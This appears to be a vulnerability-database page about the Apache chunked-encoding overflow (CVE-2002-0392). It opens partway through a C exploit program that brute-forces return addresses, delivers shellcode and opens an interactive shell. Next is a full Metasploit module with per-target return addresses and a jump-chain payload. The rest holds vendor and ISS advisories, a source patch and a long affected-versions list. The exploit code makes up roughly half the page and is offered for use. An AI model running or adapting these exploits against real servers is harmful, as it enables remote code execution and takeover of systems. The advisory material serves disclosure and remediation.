	fflush(stdout);
	he = gethostbyname(hostp);
	if(he)
		memcpy(&ia.s_addr, he->h_addr, 4);
	else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
		printf("There'z no %s on this side of the Net!\n", hostp);
		return -1;
	}

	printf("%s\n", inet_ntoa(ia));


	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
		/* skip invalid return adresses */
		if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
			continue;


		sock = socket(PF_INET, SOCK_STREAM, 0);
		sin.sin_family = PF_INET;
		sin.sin_addr.s_addr = ia.s_addr;
		sin.sin_port = htons(atoi(portp));
		if(!progress)
			printf("[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
				    + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
				    + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");

		for (i = 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p += sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i = 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j = 0; j < victim.repretaddr; j++) {
				*p++ = victim.retaddr & 0xff;
				*p++ = (victim.retaddr >> 8) & 0xff;
				*p++ = (victim.retaddr >> 16) & 0xff;
				*p++ = (victim.retaddr >> 24) & 0xff;
			}

			PUT_BYTES(victim.repzero, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
		PUT_STRING(buf);
		
		if(!shown_length) {
			printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
			shown_length = 1; 
		}
		
		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) == 0)
			progress = 1;

		if(progress == 1) {
			printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
			for(i = 0; i < 40; i ++)
				printf(" ");
			printf("\n");
			if(bruteforce)
				putchar(';');
		}
		else
			putchar(((rand()>>8)%2)? 'P': 'p');


		fflush(stdout);
		responses = 0;
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec = sc_timeout;
			tv.tv_usec = 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);
	
			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
				if(FD_ISSET(sock, &fds)) {
					if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
						break;

					if(n >= 1)
					{
						if(!owned)
						{
							for(i = 0; i < n; i ++)
								if(buf[i] == 'G')
									responses ++;
								else
									responses = 0;
							if(responses >= 2)
							{
								owned = 1;
								write(sock, "O", 1);
								write(sock, cmdz, strlen(cmdz));
								printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero);
								printf("Experts say this isn't exploitable, so nothing will happen now: ");
								fflush(stdout);
							}
						} else
  							write(1, buf, n);
  					}
				}

				if(FD_ISSET(0, &fds)) {
					if((n = read(0, buf, sizeof(buf) - 1)) < 0)
						exit(1);

					write(sock, buf, n);
				}

			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}
		

- 漏洞信息 (F82996)

Apache Win32 Chunked Encoding (PacketStormID:F82996)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
windows
CVE-2002-0392
[点击下载]

This Metasploit module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apache Win32 Chunked Encoding',
			'Description'    => %q{
				This module exploits the chunked transfer integer wrap
				vulnerability in Apache version 1.2.x to 1.3.24. This
				particular module has been tested with all versions of the
				official Win32 build between 1.3.9 and 1.3.24. Additionally,
				it should work against most co-branded and bundled versions
				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

				You will need to use the Check() functionality to determine
				the exact target version prior to launching the exploit. The
				version of Apache bundled with Oracle 8.1.7 will not
				automatically restart, so if you use the wrong target value,
				the server will crash.
			},
			'Author'         => 'hdm',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-0392' ],
					[ 'OSVDB', '838'],
					[ 'BID', '5033' ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],

				],
			'Privileged'     => true,
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 987,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'MinNops'  => 200,
					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

				},
			'Targets'        => 
				[
					[  'Windows Generic Bruteforce', {} ],

					# Official Apache.org win32 builds
					[  'Apache.org Build 1.3.9->1.3.19', 
						{
							'Ret' => 0x00401151, 
							'Pad' => [6,2,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22->1.3.24', 
						{
							'Ret' => 0x00401141, 
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.19->1.3.24', 
						{
							'Ret' => 0x6ff6548d,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22',
						{
							'Ret' => 0x6ff762ac,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call ebx
					[  'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
						{
							'Ret' => 0x1c0f13e5,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call esi
					[  'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
						{
							'Ret' => 0x1c0f1033,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Interesting return to PEB trick for Windows 2003 systems...
					[  'Windows 2003 English SP0',
						{
							'Ret' => 0x7ffc0638,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Pop/Pop/Return on Windows 2000 
					[  'Windows 2000 English',
						{
							'Ret' => 0x75022ac4,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Oracle HTTPD: [ 8.1.7 ] (one shot)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 8.1.7 Apache 1.3.12',
						{
							'Ret' => 0x1d84d42c,
							'Pad' => [7]
						}
					],

					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 9.1.0 Apache 1.3.12',
						{
							'Ret' => 0x10016061,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
					[  'Oracle 9.2.0 Apache 1.3.22',
						{
							'Ret' => 0x6ff6427a,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Generic debugging targets
					[  'Debugging Target',
						{
							'Ret' => 0xcafebabe,
							'Pad' => [0,1,2,3,4,5,6,7]
						}
					]
				],
			'DisclosureDate' => 'Jun 19 2002',
			'DefaultTarget'  => 0))
	end

	def check
		response = send_request_raw({'uri' => '/'}, 5)

		if response.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe 
		end

		code = Exploit::CheckCode::Appears

		case response['Server']
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
				print_status("IBM backported the patch, this system is not vulnerable")
				code = Exploit::CheckCode::Safe
			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
			else
				code = Exploit::CheckCode::Safe
		end

		if code == Exploit::CheckCode::Appears
			print_status("Vulnerable server: #{response['Server']}")
		else
			print_status("Server is probably not vulnerable: #{response['Server']}")
		end

		return code
	end

	def exploit
		if target_index == 0
			targets.each_with_index { |targ, idx|
				next if idx == 0

				exploit_target(targ)
			}
		else
			exploit_target(target)
		end
	end

	def exploit_target(target)
		target['Pad'].each { |pad|
			pattern = 
				rand_text_alphanumeric(3936) + 
				payload.encoded + 
				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
				rand_text_alphanumeric(pad)

			# Move slightly further back to allow padding changes
			pattern +=
				"\xeb\xf0\xde\xad" +
				[target.ret].pack('V')

			# Create a chain of return addresses and reverse jumps
			254.times { |x|
				pattern +=
					"\xeb\xf6\xbe\xef" +
					[target.ret].pack('V')
			}

			# Even out the request length based on the padding value
			# This is required to reliably hit the return address offset
			pattern += rand_text_alphanumeric(8 - pad)

			#
			# Regardless of what return we hit, execution jumps backwards to the shellcode:
			#                                   _______________ _______________ ___________
			#       _________    _____________  | ________    | | ______      | | ______
			#       v       |    v           |  v v      |    | v v    |      | v v    |
 			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
			#
		
			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

			# Build the request
			send_request_raw({
				'uri'     => '/',
				'headers' => 
					{
						'Transfer-Encoding' => "CHUNKED"
					},
				'data'    => "FFFFFFF0 " + pattern,
			}, 2)

			# Check the handler
			handler
		}
	end

end
    

- 漏洞信息 (F26283)

apache-chunked.txt (PacketStormID:F26283)
2002-06-19 00:00:00
Mark Litchfield,Apache developers  httpd.apache.org
CVE-2002-0392
[点击下载]

Apache Advisory - A vulnerability found in the chucked encoding implementation of the Apache 1.3.24 and 2.0.36 and below servers can under some conditions be used to remotely execute code on systems running this software.

-----BEGIN PGP SIGNED MESSAGE----- 

Date: June 17, 2002 
Product: Apache Web Server 
Versions: Apache 1.3 all versions including 1.3.24, Apache 2 all versions 
up to 2.0.39 

Introduction: 

While testing for Oracle vulnerabilities, Mark Litchfield discovered a 
denial of service attack for Apache on Windows. Investigation by the 
Apache Software Foundation showed that this issue has a wider scope, which 
on some platforms results in a denial of service vulnerability, while on 
some other platforms presents a potential a remote exploit vulnerability. 

We were also notified today by ISS that they had published the same issue 
which has forced the early release of this advisory. 

The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2002-0392 to this issue. 

Description: 

Versions of the Apache web server up to and including 1.3.24 and 2.0 up to 
and including 2.0.36 and 2.0.36-dev versions contain a bug in the routines 
which deal with invalid requests which are encoded using chunked encoding. 
This bug can be triggered remotely by sending a carefully crafted invalid 
request. This functionality is enabled by default. 

In most cases the outcome of the invalid request is that the child process 
dealing with the request will terminate. At the least, this could help a 
remote attacker launch a denial of service attack as the parent process 
will eventually have to replace the terminated child process and starting 
new children uses non-trivial amounts of resources. 

On the Windows and Netware platforms, Apache runs one multithreaded child 
process to service requests. The teardown and subsequent setup time to 
replace the lost child process presents a significant interruption of 
service. As the Windows and Netware ports create a new process and reread 
the configuration, rather than fork a child process, this delay is much 
more pronounced than on other platforms. 

In Apache 2.0 the error condition is correctly detected, so it will not 
allow an attacker to execure arbitrary code on the server. However 
platforms could be using a multithreaded model of multiple concurrent 
requests per child process (although the default preference remains 
multiple processes with a single thread and request per process, and most 
multithreaded models continue to create multiple child processes). Using 
any multithreaded model, all concurrent requests currently served by the 
affected child process will be lost. 

In Apache 1.3 the issue causes a stack overflow. Due to the nature of the 
overflow on 32-bit Unix platforms this will cause a segmentation violation 
and the child will terminate. However on 64-bit platforms the overflow 
can be controlled and so for platforms that store return addresses on the 
stack it is likely that it is further exploitable. This could allow 
arbitrary code to be run on the server as the user the Apache children are 
set to run as. 

We have been made aware that Apache 1.3 on Windows is exploitable in this 
way. 

Please note that the patch provided by ISS does not correct this 
vulnerability. 

The Apache Software Foundation are currently working on new releases that 
fix this issue, please see http://httpd.apache.org/ for updated 
versions. 

-----BEGIN PGP SIGNATURE----- 
Version: PGP 6.5.8 

iQCVAwUBPQ4aj+6tTP1JpWPZAQHIDwP/UrFoCphthG1gd82ZaAQT0hjCaExlFaM2 
p8BY5P6JS7VrRlzUoGd/7GRBF9o7foNpgFlANx1NNttr8FhHqlRbFBZH6u1FmTpY 
4zGq7GKFuZiiAKWaCaCFcpIQguJ1vlrJc49E9k9jvJhuyzh/0Jz/Lj/wAFgmctqm 
6Q7MwIcb1bk= 
=fZnx 
-----END PGP SIGNATURE----- 
    

- 漏洞信息 (F26282)

apache-chunked-xforce.txt (PacketStormID:F26282)
2002-06-19 00:00:00
ISS  iss.net
CVE-2002-0392
[点击下载]

ISS reported a vulnerability found in the chucked encoding implementation of the Apache 1.3.24 and 2.0.36 and below servers that under some conditions can be used to remotely execute code on systems running this software. Note that the by ISS supplied patch, which is included in this advisory, does not fix this vulnerability.

-----BEGIN PGP SIGNED MESSAGE----- 

Internet Security Systems Security Advisory 
June 17, 2002 

Remote Compromise Vulnerability in Apache HTTP Server 

Synopsis: 

ISS X-Force has discovered a serious vulnerability in the default 
version of Apache HTTP Server. Apache is the most popular Web server and 
is used on over half of all Web servers on the Internet. It may be 
possible for remote attackers to exploit this vulnerability to 
compromise Apache Web servers. Successful exploitation may lead to 
modified Web content, denial of service, or further compromise. 

Affected Versions: 

Apache 1.x 

Note: Many commercial Web Application Servers such as Oracle 9ias and 
IBM Websphere use Apache HTTP Server to process HTTP requests. 
Additional products that bundle Apache HTTP Server for Windows may be 
affected. 

Description: 

The Apache HTTP Server is maintained by the Apache Software Foundation. 
Apache is an extremely popular open-source Web server. Netcraft 
(http://www.netcraft.com) reports that as of May 2002, Apache accounts 
for over 63% of all active Web sites. Apache?s installed base is larger 
than all other Web servers combined. 

The Apache Project is an open-source and volunteer collaboration aimed 
to create and maintain a free, feature-rich, powerful, and secure Web 
server implementation. Apache is well regarded as the best, freely 
available Web server. 

Apache contains a flawed mechanism meant to calculate the size of 
"chunked" encoding. Chunked encoding is part of the HTTP Protocol 
Specification used for accepting data from Web users. When data is sent 
from the user, the Web server needs to allocate a memory buffer of a 
certain size to hold the submitted data. When the size of the data being 
submitted is unknown, the client or Web browser will communicate with 
the server by creating "chunks" of data of a negotiated size. 

The Apache HTTP Server has a software flaw that misinterprets the size 
of incoming data chunks. This error may lead to a signal race, heap 
overflow, and to exploitation of malicious code. 

X-Force has verified that this issue is exploitable on Apache for 
Windows (Win32) version 1.3.24. Apache 1.x for Unix contains the same 
source code, but X-Force believes that successful exploitation on most 
Unix platforms is unlikely. 

Recommendations: 

Internet Scanner X-Press Update 6.12 includes a check, 
ApacheChunkedEncodingBo, to detect installations of Apache HTTP Server 
for Win32. XPU 6.12 is available from the ISS Download Center at: 
http://www.iss.net/download. For questions about downloading and 
installing this XPU, email support@iss.net. 

Detection support for this attack will be included in future X-Press 
Updates for RealSecure Network Sensor 6.x and 7.0. These XPUs will be 
available from the ISS Download Center, and this alert will be updated 
when these updates become available. 

ISS X-Force has developed a patch for this issue. Follow the 
instructions below, or contact your vendor for assistance: 

To apply a source code patch to your Apache package: 

1. Locate your source directory and navigate into the "main" sub- 
directory. 
2. Verify that "http_protocol.c" is present in the current directory. 
3. To update your http_protocol.c file, create a file named 
"apache_patch.diff", containing the following text: 

- --- http_protocol.c.vuln Fri Jun 14 16:12:50 2002 
+++ http_protocol.c Fri Jun 14 16:13:47 2002 
@@ -2171,7 +2171,7 @@ 

     /* Otherwise, we are in the midst of reading a chunk of data */ 

- - len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining; 
+ len_to_read = (r->remaining > (unsigned int)bufsiz) ? bufsiz : r-> 
remaining; 

     len_read = ap_bread(r->connection->client, buffer, len_to_read); 
     if (len_read <= 0) { 

4. Apply the source code update using the "patch" command, or a similar 
   utility. 
5. Build new binaries and reinstall. 

The Apache Server Project has been notified and will make a formal patch 
available soon. Please refer to the Apache Server Project?s homepage for 
more information: http://httpd.apache.org/ 

Additional Information: 

http://www.iss.net/security_center 
http://www.apache.org 
http://httpd.apache.org/ 

Credits: 

This vulnerability was discovered and researched by Neel Mehta of the 
ISS X-Force. 

______ 

About Internet Security Systems (ISS) 
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a 
pioneer and world leader in software and services that protect critical 
online resources from an ever-changing spectrum of threats and misuse. 
Internet Security Systems is headquartered in Atlanta, GA, with 
additional operations throughout the Americas, Asia, Australia, Europe 
and the Middle East. 

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved 
worldwide. 

Permission is hereby granted for the electronic redistribution of this 
document. It is not to be edited or altered in any way without the 
express written consent of the Internet Security Systems X-Force. If you 
wish to reprint the whole or any part of this document in any other 
medium excluding electronic media, please email xforce@iss.net for 
permission. 

Disclaimer: The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS 
condition. There are NO warranties, implied or otherwise, with regard to 
this information or its use. Any use of this information is at the 
user's risk. In no event shall the author/distributor (Internet Security 
Systems X-Force) be held liable for any damages whatsoever arising out 
of or in connection with the use or spread of this information. 

X-Force PGP Key available on MIT's PGP key server and PGP.com's key 
server, as well as at http://www.iss.net/security_center/sensitive.php 

Please send suggestions, updates, and comments to: X-Force 
xforce@iss.net of Internet Security Systems, Inc. 

-----BEGIN PGP SIGNATURE----- 
Version: 2.6.2 

iQCVAwUBPQ4GqzRfJiV99eG9AQHAAQQArA9Xso3VW2fdkUYjyu/mjzji6d13ekEw 
o13+G231veDDNdA6dy3QB5JxrspUehzIIvp2Ceo5ZjegBZVEJW0VnnOJ8FsnY6Uj 
wArq9Je2r2X55AYOWIVCFtlfcKtON68couPaMumldWcLBQ+ktJCY7oygydXFfs19 
6iBtJDMKucs= 
=eZeq 
-----END PGP SIGNATURE----- 
    

- 漏洞信息 (F26278)

apache_1.3.26.tar.gz (PacketStormID:F26278)
2002-06-19 00:00:00
 
unix
CVE-2002-0392
[点击下载]

Apache is the most popular webserver on the Internet, quite possibly the best in terms of security, functionality, efficiency, and speed. Changelog available here.

- 漏洞信息

838
Apache HTTP Server Chunked Encoding Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Apache Web Server contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to the mechanism that calculates the size of "chunked" encoding not properly interpreting the buffer size of data being transferred. By sending a specially crafted chunk of data, an attacker can possibly execute arbitrary code or crash the server.

- 时间线

2002-06-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.3.26, 2.0.39 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache Chunked-Encoding Memory Corruption Vulnerability
Boundary Condition Error 5033
Yes No
2002-06-17 12:00:00 2008-01-11 11:09:00
Discovered independently by Neel Mehta of ISS X-Force and Mark Litchfield of Next Generation Security Software.

- 受影响的程序版本

RedHat Secure Web Server 3.2 i386
Oracle Oracle HTTP Server for Apps only 1.0.2 .1s
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.1
+ Apache Software Foundation Apache 1.3.12
Oracle Oracle HTTP Server 9.0.2
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle HTTP Server 1.0.2 .2 Roll up 2
Oracle Oracle HTTP Server 1.0.2 .2
Oracle Oracle HTTP Server 1.0.2 .1
Oracle Oracle HTTP Server 1.0.2 .0
Macromedia JRun 4.0
- Microsoft IIS 5.1
- Microsoft IIS 5.0
- Microsoft IIS 4.0
Macromedia ColdFusion Server MX Professional
Macromedia ColdFusion Server MX Enterprise
Macromedia ColdFusion Server MX Developer
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 7.0
- Sun Solaris 2.6
HP VirtualVault 4.6
- HP HP-UX 11.0 4
HP VirtualVault 4.5
- HP HP-UX 11.0 4
HP Tru64 UNIX INTERNET EXPRESS 5.9
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP OpenView Service Information Portal 3.0
HP OpenView Service Information Portal 2.0
HP OpenView Service Information Portal 1.0
HP OpenView Network Node Manager 6.31
HP OpenView Network Node Manager 6.10
- HP HP-UX 11.0
- HP HP-UX 10.20
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 6.2
HP OpenView Network Node Manager 6.1
HP INTERNET EXPRESS EAK 2.0
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP Compaq Secure Web Server for OpenVMS 1.2
HP Compaq Secure Web Server for OpenVMS 1.1 -1
HP Compaq Secure Web Server for OpenVMS 1.0 -1
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.35
Apache Software Foundation Apache 2.0.32
Apache Software Foundation Apache 2.0.28
Apache Software Foundation Apache 2.0
Apache Software Foundation Apache 1.3.24
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.24
+ OpenBSD OpenBSD 3.1
+ Oracle Oracle HTTP Server 9.2 .0
+ Oracle Oracle HTTP Server 9.0.1
+ Oracle Oracle9i Application Server 9.0.2
+ Oracle Oracle9i Application Server 1.0.2 .2
+ Oracle Oracle9i Application Server 1.0.2 .1s
+ Oracle Oracle9i Application Server 1.0.2
+ Slackware Linux 8.1
+ Unisphere Networks SDX-300 2.0.3
Apache Software Foundation Apache 1.3.23
- IBM AIX 4.3
+ Mandriva Linux Mandrake 8.2 ppc
